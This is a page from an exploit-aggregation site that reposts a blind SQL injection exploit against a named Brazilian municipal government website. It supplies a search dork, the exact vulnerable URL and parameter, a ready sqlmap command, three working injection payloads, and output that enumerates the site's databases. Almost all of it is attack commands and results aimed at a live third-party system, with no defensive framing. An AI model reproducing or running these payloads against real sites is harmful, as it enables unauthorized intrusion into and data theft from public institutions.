Advertisement






Brazil Floriano Municipality Blind SQL Injection

CVE Category Price Severity
N/A CWE-89 Not specified Critical
Author Risk Exploitation Type Date
Not disclosed High Remote 2021-04-11
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021040064

Below is a copy:

Brazil Floriano Municipality Blind SQL Injection
# Exploit Title: Brazil Government Floriano Municipality Blind SQL Injection Vulnerability
# Author: Emyounoone
# Date: 11/04/2021
# Tested On: Kali Linux
# Contact: https://www.instagram.com/emyounoone/
# Google Dork: galeria.php?id=

----------------------------------------------------------------------------------------------------

# Vulnerable Path: https://www.floriano.pi.gov.br/galeria.php?id=5

# python3 sqlmap.py -u https://www.floriano.pi.gov.br/galeria.php?id=5 --dbs --batch 

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=5' AND 1799=1799 AND 'Smtg'='Smtg

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=5' AND (SELECT 3577 FROM (SELECT(SLEEP(5)))SVJF) AND 'vUjE'='vUjE

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=5' UNION ALL SELECT NULL,NULL,CONCAT(0x7170767a71,0x687651446f65627a646d636a4c634c6d5541615166766162426563796554436b4f55564553674272,0x717a706a71),NULL-- -
---
available databases [2]:
[*] floriano_site
[*] information_schema

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.